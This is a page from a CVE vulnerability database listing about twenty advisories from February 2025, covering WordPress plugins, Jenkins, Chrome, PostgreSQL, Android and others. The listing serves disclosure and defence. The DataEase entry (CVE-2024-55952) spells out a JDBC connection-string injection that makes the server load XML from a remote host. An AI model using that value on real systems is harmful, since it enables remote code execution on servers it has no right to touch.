Total
32156 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-41155 | 1 Webence | 1 Iq Block Country | 2025-02-20 | N/A | 5.3 MEDIUM |
| Block BYPASS vulnerability in iQ Block Country plugin <= 1.2.18 on WordPress. | |||||
| CVE-2023-5952 | 1 Welcart | 1 Welcart E-commerce | 2025-02-20 | N/A | 9.8 CRITICAL |
| The Welcart e-Commerce WordPress plugin before 2.9.5 unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog | |||||
| CVE-2018-17463 | 3 Debian, Google, Redhat | 5 Debian Linux, Chrome, Enterprise Linux Desktop and 2 more | 2025-02-20 | 6.8 MEDIUM | 8.8 HIGH |
| Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. | |||||
| CVE-2019-1003029 | 2 Jenkins, Redhat | 2 Script Security, Openshift Container Platform | 2025-02-20 | 6.5 MEDIUM | 9.9 CRITICAL |
| A sandbox bypass vulnerability exists in Jenkins Script Security Plugin 1.53 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java, src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/SecureGroovyScript.java that allows attackers with Overall/Read permission to execute arbitrary code on the Jenkins master JVM. | |||||
| CVE-2019-1003030 | 2 Jenkins, Redhat | 2 Pipeline\, Openshift Container Platform | 2025-02-20 | 6.5 MEDIUM | 9.9 CRITICAL |
| A sandbox bypass vulnerability exists in Jenkins Pipeline: Groovy Plugin 2.63 and earlier in pom.xml, src/main/java/org/jenkinsci/plugins/workflow/cps/CpsGroovyShell.java that allows attackers able to control pipeline scripts to execute arbitrary code on the Jenkins master JVM. | |||||
| CVE-2024-55952 | 1 Dataease | 1 Dataease | 2025-02-20 | N/A | 8.8 HIGH |
| DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2023-21068 | 1 Google | 1 Android | 2025-02-20 | N/A | 7.8 HIGH |
| In (TBD) of (TBD), there is a possible way to boot with a hidden debug policy due to a missing warning to the user. This could lead to local escalation of privilege after preparing the device, hiding the warning, and passing the phone to a new user, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-243433344References: N/A | |||||
| CVE-2023-21067 | 1 Google | 1 Android | 2025-02-20 | N/A | 7.5 HIGH |
| Product: AndroidVersions: Android kernelAndroid ID: A-254114726References: N/A | |||||
| CVE-2023-21061 | 1 Google | 1 Android | 2025-02-20 | N/A | 7.5 HIGH |
| Product: AndroidVersions: Android kernelAndroid ID: A-229255400References: N/A | |||||
| CVE-2024-10978 | 2 Debian, Postgresql | 2 Debian Linux, Postgresql | 2025-02-20 | N/A | 4.2 MEDIUM |
| Incorrect privilege assignment in PostgreSQL allows a less-privileged application user to view or change different rows from those intended. An attack requires the application to use SET ROLE, SET SESSION AUTHORIZATION, or an equivalent feature. The problem arises when an application query uses parameters from the attacker or conveys query results to the attacker. If that query reacts to current_setting('role') or the current user ID, it may modify or return data as though the session had not used SET ROLE or SET SESSION AUTHORIZATION. The attacker does not control which incorrect user ID applies. Query text from less-privileged sources is not a concern here, because SET ROLE and SET SESSION AUTHORIZATION are not sandboxes for unvetted queries. Versions before PostgreSQL 17.1, 16.5, 15.9, 14.14, 13.17, and 12.21 are affected. | |||||
| CVE-2023-27517 | 1 Intel | 16 Nma1xxd128gpsu4, Nma1xxd128gpsuf, Nma1xxd256gpsu4 and 13 more | 2025-02-20 | N/A | 6.6 MEDIUM |
| Improper access control in some Intel(R) Optane(TM) PMem software before versions 01.00.00.3547, 02.00.00.3915, 03.00.00.0483 may allow an athenticated user to potentially enable escalation of privilege via local access. | |||||
| CVE-2023-22311 | 1 Intel | 7 Nma1xxd128gpsu4, Nma1xxd128gpsuf, Nma1xxd256gpsu4 and 4 more | 2025-02-20 | N/A | 6.7 MEDIUM |
| Improper access control in some Intel(R) Optane(TM) PMem 100 Series Management Software before version 01.00.00.3547 may allow an authenticated user to potentially enable escalation of privilege via local access. | |||||
| CVE-2024-24867 | 1 Plugins-market | 1 Wp Visitor Statistics | 2025-02-20 | N/A | 5.3 MEDIUM |
| Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Osamaesh WP Visitor Statistics (Real Time Traffic).This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through 6.9.4. | |||||
| CVE-2020-36666 | 1 E-plugins | 11 Directory Pro, Final User, Fitness Trainer and 8 more | 2025-02-19 | N/A | 8.8 HIGH |
| The directory-pro WordPress plugin before 1.9.5, final-user-wp-frontend-user-profiles WordPress plugin before 1.2.2, producer-retailer WordPress plugin through TODO, photographer-directory WordPress plugin before 1.0.9, real-estate-pro WordPress plugin before 1.7.1, institutions-directory WordPress plugin before 1.3.1, lawyer-directory WordPress plugin before 1.2.9, doctor-listing WordPress plugin before 1.3.6, Hotel Listing WordPress plugin before 1.3.7, fitness-trainer WordPress plugin before 1.4.1, wp-membership WordPress plugin before 1.5.7, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable. | |||||
| CVE-2023-25722 | 1 Veracode | 1 Veracode | 2025-02-19 | N/A | 5.5 MEDIUM |
| A credential-leak issue was discovered in related Veracode products before 2023-03-27. Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs, invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access of the Jenkins remote) to discover Veracode API credentials by listing the process and its arguments. Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs and when the "Connect using proxy" option is enabled and configured with proxy credentials, allows local users of the Jenkins remote to discover proxy credentials by listing the process and its arguments. Veracode Azure DevOps Extension before 3.20.0 invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access to the Azure DevOps Services cloud infrastructure or Azure DevOps Server) to discover Veracode API credentials by listing the process and its arguments. Veracode Azure DevOps Extension before 3.20.0, when configured with proxy credentials, allows users (with shell access to the Azure DevOps Services cloud infrastructure or Azure DevOps Server) to discover proxy credentials by listing the process and its arguments. | |||||
| CVE-2023-25721 | 1 Veracode | 1 Veracode | 2025-02-19 | N/A | 6.5 MEDIUM |
| Veracode Scan Jenkins Plugin before 23.3.19.0, when the "Connect using proxy" option is enabled and configured with proxy credentials and when the Jenkins global system setting debug is enabled and when a scan is configured for remote agent jobs, allows users (with access to view the job log) to discover proxy credentials. | |||||
| CVE-2023-25260 | 1 Stimulsoft | 1 Designer | 2025-02-19 | N/A | 7.5 HIGH |
| Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion. | |||||
| CVE-2023-20860 | 1 Vmware | 1 Spring Framework | 2025-02-19 | N/A | 7.5 HIGH |
| Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass. | |||||
| CVE-2022-48356 | 1 Huawei | 2 Emui, Harmonyos | 2025-02-19 | N/A | 7.5 HIGH |
| The facial recognition module has a vulnerability in input parameter verification. Successful exploitation of this vulnerability may cause failed facial recognition. | |||||
| CVE-2022-48347 | 1 Huawei | 2 Emui, Harmonyos | 2025-02-19 | N/A | 7.5 HIGH |
| The MediaProvider module has a vulnerability in permission verification. Successful exploitation of this vulnerability may affect confidentiality. | |||||